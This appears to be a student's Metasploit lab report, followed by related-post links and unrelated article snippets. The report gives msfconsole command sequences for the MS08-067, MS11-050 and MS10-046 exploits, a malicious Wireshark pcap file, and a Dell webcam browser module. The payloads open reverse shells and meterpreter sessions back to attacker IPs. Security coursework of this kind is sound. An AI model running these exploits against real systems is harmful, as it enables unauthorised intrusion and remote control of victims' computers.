1. 实践内容(3.5分)

1.1一个主动攻击实践; (1分)

首先攻击Windows XP:

  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show payloads
    msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp //tcp反向回连
    msf exploit(ms08_067_netapi) > set LHOST 攻击机IP地址 //攻击机ip
    msf exploit(ms08_067_netapi) > set LPORT 5321 //攻击端口
    msf exploit(ms08_067_netapi) > set RHOST 靶机IP地址 //靶机ip,特定漏洞端口已经固定
    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    msf exploit(ms08_067_netapi) > exploit //攻击

结果并没有成功。。。

又试着攻击了一下Windows server 2008,还是没有成功

又换了Windows7,结果还是失败了

找同学拷了一个Windows server 2000,来攻击,还是失败了

后来,我尝试更换了一个payload,从generic/shell_bind_tcp换成了generic/shell_reverse_tcp,终于攻击Windows server 2000成功了

1.2 一个针对浏览器的攻击;(1分)

还是首先攻击Windows XP:

  • 首先使用ms11_050漏洞:
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    msf exploit(ms11_050_cobjectelement) > set LHOST 攻击机IP地址 //攻击机ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5321 //攻击端口固定
    msf exploit(ms11_050_cobjectelement) > set URIPATH 20165321 //统一资源标识符路径设置
    msf exploit(ms11_050_cobjectelement) > exploit //攻击

在Windows XP上试了一下,没有成功

又在Windows7上试,发现Windows7上的IE是IE11,而且无法安装更老版本的IE8,只好作罢。

  • 后来,我换了一个漏洞,使用ms10_046漏洞,重新攻击Windows XP:

尝试了好几个payload,windows/meterpreter/bind_tcpwindows/meterpreter/reverse_tcpwindows/meterpreter/reverse_http,最后,使用了windows/shell/reverse_tcp,终于攻击成功了。

1.3 一个针对客户端的攻击;(1分)

search wireshark
use windows/fileformat/wireshark_packet_dect.rb
set payload windows/shell/reverse_tcp
set LHOST 192.168.70.146
set LPORT 5321
exploit
会生成一个passwords.pcap文件,把这个文件拷到Windows XP下,回到kali,
back
use exploit/multi/handler
set payload windows/shell/reverse_tcp
exploit
进行监听,在Windows XP中用wireshark打开passwords.pcap文件,在kali中就获取了Windows XP的shell。

1.4 成功应用任何一个辅助模块。(0.5分)

  • 我选用的模块是exploit/windows/browser/dell_webcam_crazytalk

msf5 exploit(windows/browser/dell_webcam_crazytalk) > set payload windows/meterpreter/reverse_http
msf5 exploit(windows/browser/dell_webcam_crazytalk) > show options
msf5 exploit(windows/browser/dell_webcam_crazytalk) > set LPORT 8080
msf5 exploit(windows/browser/dell_webcam_crazytalk) > set LHOST 192.168.70.144
msf5 exploit(windows/browser/dell_webcam_crazytalk) > exploit





就能看到攻击成功的画面了:

2. 基础问题回答

  • 用自己的话解释什么是exploit,payload,encode。
    答:exploit就是实施攻击;payload就是把攻击代码“背”到靶机的传输方式;encode就是对攻击代码进行编码,使其形态改变,不易被靶机查杀。

3. 实践总结与体会

本次实验是继前4次以来,耗时最久的,时间大多数都花在寻找可用漏洞与有效载荷上面。我深刻地体会到作为一名黑客的不容易,不仅要费尽心思寻找漏洞,而且还要找到合适的靶机,才能攻击成功。

4. 离实战还缺些什么技术或步骤?

还缺比较新的漏洞、更熟练的操作、能够直接攻击广域网内计算机的能力,等等……

2018-2019-2 网络对抗技术 20165321 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. beta冲刺1/7

    目录 摘要 团队部分 个人部分 摘要 队名:小白吃 组长博客:hjj 作业博客:beta冲刺(1/7) 团队部分 后敬甲(组长) 过去两天完成了哪些任务 团队完成测试答辩 整理博客 复习接口 接下来的 ...

  2. vue入门知识点

    最近入坑vue 做一点小的记录 有不对的 辛苦指出 会第一时间更改上新 0.利用vue-cli构建项目新建一个目标文件夹 ,全局安装vue-cli脚手架工具 (全局安装一次即可) npm instal ...

  3. PyCharm 怎么查看 Python 的变量类型和变量内容

    一.在程序的某一行添加断点 二.选择 debug 程序

  4. ISP PIPLINE (六) 3A 综述

    前言: 上一篇文章: ISP PIPLINE (五) Denoise 下一篇文章: (1)3A定义包括什么 Iris:自动光圈,根据环境自动调节光圈. 既然讲到光圈,就先看一下光圈是什么,以及它如何影 ...

  5. Hibernate 映射多对多关联关系

    映射多对多,需要建立一张中间表 一共三张表,一个是 Category,一个是 Item,还有一个是 Categories_Items Categories_Items 作为中间表,其包含两个列,分别对 ...

  6. day11_单元测试_读取yaml文件中的用例,自动获取多个yaml文件内容执行生成报告

    一.使用.yaml格式的文件直接可以存放字典类型数据,如下图,其中如果有-下一行有缩进代表这是个list,截图中是整体是一个list,其中有两部分,第二部分又包含另外一个list 二.单元测试:开发自 ...

  7. python学习:常量和变量

    变量的作用:存储信息,日后被调用和修改操作. 常量:固定不变得量,字母要大些. 变量的命名规则: 1.由字母数字下划线组成: 2.不能以数字开头,不能含有特殊字符和空格: 3.不能以保留字命名: 4. ...

  8. 201771010126 王燕《面向对象程序设计(java)》第八周学习总结

    实验六 接口的定义与使用 实验时间 2018-10-18 1.实验目的与要求 (1) 掌握接口定义方法 JAVA中通过interface关键字定义接口: 接口中只能定义public static fi ...

  9. MyISAM和Innodb区别,为什么?

    事务支持 MyISAM不支持事务,而InnoDB支持. InnoDB的AUTOCOMMIT默认是打开的,即每条SQL语句会默认被封装成一个事务,自动提交,这样会影响速度, 所以最好是把多条SQL语句显 ...

  10. centos7下NFS使用与配置

    NFS是Network File System的缩写,即网络文件系统.客户端通过挂载的方式将NFS服务器端共享的数据目录挂载到本地目录下. nfs为什么需要RPC?因为NFS支持的功能很多,不同功能会 ...